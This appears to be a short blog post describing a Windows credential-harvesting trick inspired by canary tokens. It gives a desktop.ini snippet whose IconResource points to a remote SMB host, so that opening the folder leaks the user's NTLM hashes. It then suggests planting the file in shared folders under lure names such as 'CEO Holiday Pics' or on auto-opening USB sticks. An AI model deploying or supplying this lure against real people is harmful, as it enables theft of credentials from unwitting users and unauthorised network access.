Malware not needed ?

Recently had a duh moment while playing with the 'opened folder' canary technique used by canary tokens.org - a thinkst.com project

One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to it's users, this happens by checking for a hidden desktop.ini file that will point the OS to folder view preferences.

Canary works by directing the preferences to a remote server (that is listening for incoming requests) when that request comes in, we know the folder has been entered ! very sneaky! ( I didn't know about this technique until I was exploring the canary tokens.org available payloads

So I figured, if we point it to a remote location with SMB authentication on it, we know that windows will automatically send it's current user's credentials to the location, I'll get hashes!

[.ShellClassInfo]
IconResource=\\internetportscan.online\resource.dll  

It works! so, if you are ever on a RedTeam and you have access to a shared folder plant one in there will need to make a share readonly for the desktop.ini to persist with a name like PeopleGettingSacked or Movies or CEO Holiday Pics ... whatever, you know better than me...

Additionally if you put the desktop.ini flat on a USB stick as soon as the pen is mounted (unless auto-run is disabled, it will open up the folder automatically (actioning the attack)

I bet this is already being used out there ! ... very sneaky/powerful, I had to share ... infact I can't help thinking this might be a very well known thing and i'm out of the loop -_-

I think there is some caching of the desktop.ini too (at least with windows 10, as when I ejected my evil USB I could still see incoming requests from my machine. - will follow up with that.


An indepth look into options when writing a desktop.ini file, possibly more oppertunities for trouble ? https://hwiegman.home.xs4all.nl/desktopini.html

Attacker & User view : https://www.youtube.com/watch?v=t8zqJm5d8gg